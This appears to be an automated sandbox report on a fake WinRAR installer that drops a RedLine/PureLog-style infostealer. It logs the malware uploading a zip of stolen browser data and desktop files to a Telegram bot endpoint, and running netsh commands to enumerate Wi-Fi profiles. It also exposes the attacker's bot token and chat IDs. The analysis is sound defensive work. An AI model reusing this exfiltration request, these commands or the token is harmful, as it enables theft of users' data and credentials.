                                                          {"ok":true,"result":{"message_id":147550,"from":{"id":5912059723,"is_bot":true,"first_name":"Omda","username":"omda404bot"},"chat":{"id":750182271,"first_name":"Mohamed","last_name":"Emad","username":"dukeomda","type":"private"},"date":1723578540,"document":{"file_name":"C_UsersuserAppDataLocal4a3035c4cb9343f74ca34670ddce645duser@52.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAECQF5mu7isLIx4YuZjNPq8VLwV0CeAuwAC8BQAAon74FHH966X42sbaTUE","file_unique_id":"AgAD8BQAAon74FE","file_size":162325}}}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.449746149.154.167.2204437740C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-13 19:49:01 UTC254OUTPOST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary="54c32106-8dd3-4cf7-866e-0576783efbb1"
                                                          Host: api.telegram.org
                                                          Content-Length: 162674
                                                          Expect: 100-continue
                                                          2024-08-13 19:49:01 UTC25INHTTP/1.1 100 Continue
                                                          2024-08-13 19:49:01 UTC40OUTData Raw: 2d 2d 35 34 63 33 32 31 30 36 2d 38 64 64 33 2d 34 63 66 37 2d 38 36 36 65 2d 30 35 37 36 37 38 33 65 66 62 62 31 0d 0a
                                                          Data Ascii: --54c32106-8dd3-4cf7-866e-0576783efbb1
                                                          2024-08-13 19:49:01 UTC265OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 34 61 33 30 33 35 63 34 63 62 39 33 34 33 66 37 34 63 61 33 34 36 37 30 64 64 63 65 36 34 35 64 5c 6a 6f 6e 65 73 40 35 32 38 31 31 30 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 34 61 33 30 33 35 63 34 63 62 39 33 34 33 66 37 34 63 61 33 34 36 37 30 64 64 63 65 36 34 35 64 25 35 43 6a 6f 6e 65 73 25 34 30 35 32 38 31 31 30 5f 65 6e 2d
                                                          Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C4a3035c4cb9343f74ca34670ddce645d%5Cuser%40528110_en-
                                                          2024-08-13 19:49:01 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 78 ab 0d 59 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 16 7e 0d 59 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 16 7e 0d 59 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae
                                                          Data Ascii: PKxYBrowsers\Edge\PK~YQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PK~YceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
                                                          2024-08-13 19:49:01 UTC16355OUTData Raw: 7c 5c fa 6c 7e 05 df 60 ad 15 5c 2e c6 42 65 ed c3 95 75 39 ce ad 30 98 b5 9b 01 13 80 d8 69 88 5b 9d 1e d7 59 c0 10 42 2c d5 27 f6 66 f2 7b 3e a5 7c 1b ea 8e ed 7d 2d cc ad b7 f7 49 3a 59 59 a7 ba ef c3 27 e4 a4 ed 40 85 96 b9 b8 f2 22 f9 55 09 c0 8f f7 59 dd 0f c4 72 ae e5 17 e4 e2 8d 60 71 b7 3e 2a cc 16 47 4e 26 d6 e6 36 88 7e dd 7a 32 e6 df bf ff 50 4b 03 04 14 00 00 00 08 00 54 40 44 57 2f 31 d7 cb 82 02 00 00 02 04 00 00 3e 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 65 73 6b 74 6f 70 5c 4c 54 4b 4d 59 42 53 45 59 5a 5c 4c 54 4b 4d 59 42 53 45 59 5a 2e 64 6f 63 78 0d 53 49 92 45 21 08 db 77 d5 3f 94 02 8a f3 c3 59 ef 7f 90 76 45 89 01 4d 02 b1 87 74 74 a3 73 4f 5c 1a a3 1c 69 96 81 42 49 c3 b6 54
                                                          Data Ascii: |\l~`\.Beu90i[YB,'f{>|}-I:YY'@"UYr`q>*GN&6~z2PKT@DW/1>Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ\LTKMYBSEYZ.docxSIE!w?YvEMttsO\iBIT
                                                          2024-08-13 19:49:01 UTC16355OUTData Raw: 8c 50 7b a1 ff 28 e0 0a 65 d9 a8 d1 f9 14 a8 4d af da 3d 05 d2 f9 68 5d 6f 64 31 84 61 bb 64 27 8f 2a 44 63 fc d4 8b 22 2e 78 94 52 5b 3e d6 ea de 66 98 1d 6a 7c e5 e3 dd d4 2f 05 97 cd 14 6f a1 56 86 69 fa 03 cf a3 e0 77 26 b4 b7 44 11 fb 37 75 c1 35 1b 3a 17 5e 1f df 36 12 42 91 e6 76 6f 67 c3 81 90 70 6b 1b ef f9 c7 41 e5 cd 3a e7 97 0e 5f 7f 7f fe 00 50 4b 03 04 14 00 00 00 08 00 54 40 44 57 91 6c 91 87 85 02 00 00 02 04 00 00 3f 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4c 54 4b 4d 59 42 53 45 59 5a 5c 5a 42 45 44 43 4a 50 42 45 59 2e 6a 70 67 15 93 49 8e 40 21 08 44 f7 9d f4 a1 04 15 45 71 9e ef 7f 90 fe bd 81 84 05 54 ea 15 0f 8c 46 2e 60 ae 7e 95 70 0d 12 d0 aa a3 9c
                                                          Data Ascii: P{(eM=h]od1ad'*Dc".xR[>fj|/oViw&D7u5:^6BvogpkA:_PKT@DWl?Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ\ZBEDCJPBEY.jpgI@!DEqTF.`~p
                                                          2024-08-13 19:49:01 UTC16355OUTData Raw: ad 29 d9 06 8b d1 80 9e 93 2f 9f 5a 67 df b8 9b a2 51 f6 3b 25 ba 00 17 6b 3b 61 1e e2 b4 2d b0 24 2e 73 62 59 58 41 1c c2 a7 d6 23 df 0c a5 f3 03 b8 b1 38 70 c0 00 b0 3a f9 61 20 ef 02 8f d2 0f cc 9d 05 04 0d 15 12 11 d9 f2 e7 aa 21 01 03 c2 ca 6b 10 26 56 50 82 b3 ff 25 17 61 8f dc e0 fd 91 74 b0 e0 04 94 20 20 52 ff 17 2c 0e 3a fc a6 7b 00 16 20 95 c3 30 b0 80 60 82 e4 b8 05 23 81 1e 98 de 27 a2 90 60 fe 87 42 a4 33 4b d0 69 05 27 9d 11 d0 9b 02 70 36 b0 93 18 51 3a 16 89 0b ce 19 83 67 a3 71 64 3e 16 11 48 64 96 1b 8c 41 b3 32 99 88 73 20 b0 48 b8 4e 94 c9 88 83 c4 c2 04 19 1e 7a c1 61 38 42 87 ce 5c 68 80 72 41 15 84 b9 69 4e 0f d1 0c 47 66 ef f5 41 05 70 7c d6 18 dd 63 33 03 89 d9 6d 44 31 ca 74 58 0c 09 89 c7 98 f4 73 68 f1 a9 f5 52 3d 75 9a 01 71
                                                          Data Ascii: )/ZgQ;%k;a-$.sbYXA#8p:a !k&VP%at R,:{ 0`#'`B3Ki'p6Q:gqd>HdA2s HNza8B\hrAiNGfAp|c3mD1tXshR=uq
                                                          2024-08-13 19:49:01 UTC16355OUTData Raw: 9b 7d 9a bf f3 11 ae 90 1f 4e 7d 99 98 7d 7f 16 05 38 7a 94 1c 81 55 d4 79 2f 8a 79 f4 07 66 cd d3 f7 97 fc 15 b8 d9 07 fd b9 69 4d f6 45 56 18 c4 2b e4 c4 70 b7 e9 ca f0 d7 d9 c5 5b af 57 1e ff f8 d6 c4 b8 88 43 0e 48 7b 6e ed 9c dd ae 23 20 4d d0 38 2e b9 4c 1b e8 34 a7 be a7 7c 2c f8 3c 87 ba 3d f6 60 73 d2 ae dc 91 21 9b af fc dd 68 ab 5a bc 72 66 d5 11 0a f0 ee b1 34 e6 5e 91 8f b8 3d e5 b4 e1 80 02 66 f1 1b 33 d8 37 1d 83 55 61 8c c3 03 63 32 4f 58 5a 0b bb fa ef d7 86 3e f5 9f 84 6e 56 8a 90 c6 5b cb 99 0e 1f 89 91 6d c6 94 68 8d 67 f6 70 75 2e 71 24 64 31 8e 7d 68 7b 22 40 1e dd 49 32 f1 e9 3b 71 ab 46 a8 54 fc 5d e1 fd b6 3b 65 8f 1a 4e af ed 73 a6 bf 1d 15 f1 b7 c1 75 0f 7a 09 1b 9b e9 cd ae f0 9b 4e ad 72 79 8e 3b 4f f0 40 d4 98 58 2a 8a fd 58
                                                          Data Ascii: }N}}8zUy/yfiMEV+p[WCH{n# M8.L4|,<=`s!hZrf4^=f37Uac2OXZ>nV[mhgpu.q$d1}h{"@I2;qFT];eNsuzNry;O@X*X
                                                          2024-08-13 19:49:01 UTC16355OUTData Raw: 65 ba 24 3b 75 df 3c 6d 26 33 5f 7c de 8b c2 7e ca 36 6e 31 1e 6f 9d 10 ae bf 6e 85 e6 3a e7 14 78 02 ab ab 38 a0 a9 fa 44 df 94 30 24 17 47 8b 13 12 64 6b 56 22 b8 1d 2f 79 e3 10 3f 7e 9a 81 f7 a6 2a 9a 3c 06 1f bc be 7b 1e 30 7c f2 2a f5 d8 d0 ad a4 24 f8 c1 3e 63 85 aa 98 9f f6 ad c3 35 a7 81 ea 8b 1b 0d 68 7d af d7 0f 9c ba 1e 80 c2 a8 9b 7e e2 37 89 fd 6f 25 5e 37 20 94 67 7d 6d f8 38 0a 9b 0d e9 72 96 6e ec 63 71 d8 09 2d 1b 4f ab 9f 12 36 1c ad 05 fb d9 84 1d 89 47 b0 c1 76 44 2e b7 64 58 c0 ec 9d 69 ca 3d b1 cf 86 24 4d 85 74 d6 48 c9 0d 7f 42 89 da 33 cc 9d d9 f6 db 45 da 68 37 55 b9 57 82 c6 ed da 81 b0 67 25 3d a4 41 da a8 eb ac 13 74 98 69 a5 8e d9 76 df 72 8e 6f 74 5d 1d 11 b1 4e 50 c1 ca ec 04 ab 05 81 2f 54 12 dc d2 d1 12 3e 7a 66 6b 98 a8
                                                          Data Ascii: e$;u<m&3_|~6n1on:x8D0$GdkV"/y?~*<{0|*$>c5h}~7o%^7 g}m8rncq-O6GvD.dXi=$MtHB3Eh7UWg%=Ativrot]NP/T>zfk
                                                          2024-08-13 19:49:01 UTC16355OUTData Raw: eb 4b b7 d2 22 c3 94 4d b4 26 b6 87 88 ba 55 85 d2 57 53 d4 35 53 29 22 73 4a 0b c2 9d a5 96 b2 78 45 55 ef 52 a9 cc b1 9c 9a dc 97 33 9c 05 f7 7c 45 56 31 55 5e d8 38 d9 4e a9 0d 52 34 42 a8 03 93 25 ed b3 e3 45 9f c8 69 89 ed 66 56 5c 26 99 7a 98 e6 ef a8 db c0 9a 4a 93 c0 1f d9 7e 34 27 9b 72 05 b3 6a 3a 60 d0 08 07 b4 93 b0 84 c7 28 b0 f8 14 8f 1f 9b fc 24 5b 3c c8 bf a5 ea d7 48 2a af 38 72 6f 70 5b ee 6f 7a 0f 52 ef ba d2 51 e3 36 f6 8b 7d 4d fb ec b7 d7 1b 99 19 35 05 55 54 74 b4 32 69 3d 95 5c 5b 1a b9 71 f8 99 11 8d ae 70 20 34 54 f4 4e ff 78 0a a3 df 88 49 e7 1e 20 1f de 91 15 d8 85 fa 62 7f ad c6 6e 84 e1 32 cc da 11 35 db fd 9a bd c4 75 41 f8 a8 64 bf 2c 5e d2 3c 22 a1 ad 12 74 e2 db 96 15 ed fc 32 df 76 b4 e9 c8 fe b9 ad 0b 10 e6 9f 0a 2e 5e
                                                          Data Ascii: K"M&UWS5S)"sJxEUR3|EV1U^8NR4B%EifV\&zJ~4'rj:`($[<H*8rop[ozRQ6}M5UTt2i=\[qp 4TNxI bn25uAd,^<"t2v.^
                                                          2024-08-13 19:49:01 UTC16355OUTData Raw: b7 ee 1f 53 d5 55 dd fb e9 5d 6b 3f b6 d7 5e 6b ed b5 7e bf 95 6d 0d be f3 e0 1a 2b d2 c6 45 97 95 76 c7 e5 61 c2 45 28 86 3e 8d a5 51 0b aa 88 66 15 63 46 93 18 78 25 7b ee d8 a9 d0 7a 3b b8 c3 24 cf 72 9e 64 15 5d 1b 7d d5 93 51 82 f6 d4 9d 44 df a1 89 93 2b 6a a2 f4 60 f2 ed ad 28 ff cf c8 38 59 37 2f ce cf 9a ab 7e 86 21 0f 10 84 4f 82 72 85 e3 25 32 05 4b cb b8 9d 44 33 30 3d 14 7d a7 79 d4 b8 1f a0 39 d0 0f f1 63 83 62 bb 7b ae 65 1a 5a 72 9d ca 97 74 45 9f 28 68 c9 f9 86 f1 a7 07 30 68 f2 4e 61 e6 dd 8e f4 4e 53 d6 cb c2 c9 b0 98 7e 85 13 37 3a 18 8c 7a 61 8f 17 2f d7 c1 c7 ff 4b 13 6c 6f 63 b4 a2 98 b8 5e 27 75 dd 21 77 09 33 4e 31 31 82 75 d3 fa 9b 2d de 67 72 e2 26 71 08 90 d1 fd c3 29 b0 87 f2 6b 55 14 34 41 9e aa 99 62 ba de cd c8 8e 3b 19 39
                                                          Data Ascii: SU]k?^k~m+EvaE(>QfcFx%{z;$rd]}QD+j`(8Y7/~!Or%2KD30=}y9cb{eZrtE(h0hNaNS~7:za/Kloc^'u!w3N11u-gr&q)kU4Ab;9
                                                          2024-08-13 19:49:02 UTC405INHTTP/1.1 401 Unauthorized
                                                          Server: nginx/1.18.0
                                                          Date: Tue, 13 Aug 2024 19:49:02 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 58
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:15:48:04
                                                          Start date:13/08/2024
                                                          Path:C:\Users\user\Desktop\WinRAR 7.01 Pro.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\WinRAR 7.01 Pro.exe"
                                                          Imagebase:0x50000
                                                          File size:4'492'800 bytes
                                                          MD5 hash:1C8908102946928867AB16F2007B35CC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:15:48:05
                                                          Start date:13/08/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe"
                                                          Imagebase:0x7ff6c3b90000
                                                          File size:3'961'960 bytes
                                                          MD5 hash:5E2849BEF6A38ED0B163EA6128AFEA01
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:3
                                                          Start time:15:48:10
                                                          Start date:13/08/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe"
                                                          Imagebase:0x400000
                                                          File size:498'688 bytes
                                                          MD5 hash:B2795FBED63C8C1B0846B3EAEAE2FE0F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1786072465.00000000026BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe, Author: ditekSHen
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 62%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:7
                                                          Start time:15:48:51
                                                          Start date:13/08/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:15:48:51
                                                          Start date:13/08/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:15:48:51
                                                          Start date:13/08/2024
                                                          Path:C:\Windows\SysWOW64\chcp.com
                                                          Wow64 process (32bit):true
                                                          Commandline:chcp 65001
                                                          Imagebase:0x5d0000
                                                          File size:12'800 bytes
                                                          MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:15:48:51
                                                          Start date:13/08/2024
                                                          Path:C:\Windows\SysWOW64\netsh.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:netsh wlan show profile
                                                          Imagebase:0x1560000
                                                          File size:82'432 bytes
                                                          MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:15:48:52
                                                          Start date:13/08/2024
                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:findstr All
                                                          Imagebase:0xa0000
                                                          File size:29'696 bytes
                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:15:48:52
                                                          Start date:13/08/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:15:48:52
                                                          Start date:13/08/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:15:48:52
                                                          Start date:13/08/2024
                                                          Path:C:\Windows\SysWOW64\chcp.com
                                                          Wow64 process (32bit):true
                                                          Commandline:chcp 65001
                                                          Imagebase:0x5d0000
                                                          File size:12'800 bytes
                                                          MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:15:48:52
                                                          Start date:13/08/2024
                                                          Path:C:\Windows\SysWOW64\netsh.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:netsh wlan show networks mode=bssid
                                                          Imagebase:0x1560000
                                                          File size:82'432 bytes
                                                          MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Reset < >
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1787502524.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4c20000_WinRAR 7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8bq
                                                            • API String ID: 0-187764589
                                                            • Opcode ID: b3ff63a2f6acab7628fadbbc609d2be02b21cf881425ec79c88cfabf62bab09c
                                                            • Instruction ID: e1dfbd1f0c9fdfd0b01f35d4ce5374a936a7dd77afa123c19466bdced82606c8
                                                            • Opcode Fuzzy Hash: b3ff63a2f6acab7628fadbbc609d2be02b21cf881425ec79c88cfabf62bab09c
                                                            • Instruction Fuzzy Hash: D8213674E002099FDB05DFA9D944AEEBFF2EF8D300F24846AD505A7261DB345A89CF91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1787502524.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4c20000_WinRAR 7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8bq
                                                            • API String ID: 0-187764589
                                                            • Opcode ID: 131f5914c0d6d83df41318c9ce14f13b39ffcbf68d1d922944bc2ec36c7836dc
                                                            • Instruction ID: 5cd987ad6220880c7cbf4f8ede39014b83c68bcdd33b5c25e861746973f623bc
                                                            • Opcode Fuzzy Hash: 131f5914c0d6d83df41318c9ce14f13b39ffcbf68d1d922944bc2ec36c7836dc
                                                            • Instruction Fuzzy Hash: A421F574E002099FDB04EFA9D544AEEBBF2AF8C310F10846AD505A7264EB345A85CF91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1787502524.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4c20000_WinRAR 7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 618f7d25376aa255bbdfa3a75b8ffd8cf17c0e4768c1c1f1997934222ba024a4
                                                            • Instruction ID: 65659b0c98722a0954f4466689474d3d9b45bfc8dbc06203bca04d7509224870
                                                            • Opcode Fuzzy Hash: 618f7d25376aa255bbdfa3a75b8ffd8cf17c0e4768c1c1f1997934222ba024a4
                                                            • Instruction Fuzzy Hash: 73F06DB4C49245DFE706EFB8E94878CBFB0EB09300F5082AAD444D3225E3304A44CB51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1787502524.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4c20000_WinRAR 7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: adca614d2710346167a0661222dbe848a8aee3d0dad80ae89e34c752c8722cf6
                                                            • Instruction ID: 512ceda1c19c2affcc4e08290a30ff01c7adc84f1222a25aa3ab7bc84281cc09
                                                            • Opcode Fuzzy Hash: adca614d2710346167a0661222dbe848a8aee3d0dad80ae89e34c752c8722cf6
                                                            • Instruction Fuzzy Hash: F5211974E402098FDB08DFA9D5906EEBBF2BF89300F60952AD408B3354DB345946CB55
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1787502524.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4c20000_WinRAR 7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 066e92f4d4677800176d5d5435bd8f7afd9f3477b6687fe4deb4a1daca0e3f70
                                                            • Instruction ID: 081de4ded26d7042c88071fb540663120c840c47dba4e8477739dc6fbb05bfe8
                                                            • Opcode Fuzzy Hash: 066e92f4d4677800176d5d5435bd8f7afd9f3477b6687fe4deb4a1daca0e3f70
                                                            • Instruction Fuzzy Hash: 6F210974E402099FCB04DFA9D590AEEBBF2BF89310F24982AD418B3354DB346942CF55
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1787502524.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4c20000_WinRAR 7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03b9e0cc7815088bdce4ad9f0ec83265a6a065abab02b5190738bda14d1ba523
                                                            • Instruction ID: ca1d60ff5bc8e8cd5d5fa1bc20908c171be79b9cdd06e739514812a4481e7ebf
                                                            • Opcode Fuzzy Hash: 03b9e0cc7815088bdce4ad9f0ec83265a6a065abab02b5190738bda14d1ba523
                                                            • Instruction Fuzzy Hash: 3311F7B8E04209DFDB45DFA9D9546AEBBF1FB48300F2085AAD818A7365E7305A00DB81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1787502524.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4c20000_WinRAR 7.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b2fab93a28aba893ab8ae7680f4b36c4a59aaf1b4f535d22a4c426298d6266a5
                                                            • Instruction ID: f788565764e56458f0473da01b16f73fedfd5b208365fcf4b43fd07afe544941
                                                            • Opcode Fuzzy Hash: b2fab93a28aba893ab8ae7680f4b36c4a59aaf1b4f535d22a4c426298d6266a5
                                                            • Instruction Fuzzy Hash: 0FF0C974D4120ADFCB45EFB8EA4878CBBF5EB48305F1096A9D908D3225E7705A44CB95

                                                            Execution Graph

                                                            Execution Coverage:10.3%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:27.1%
                                                            Total number of Nodes:1418
                                                            Total number of Limit Nodes:19
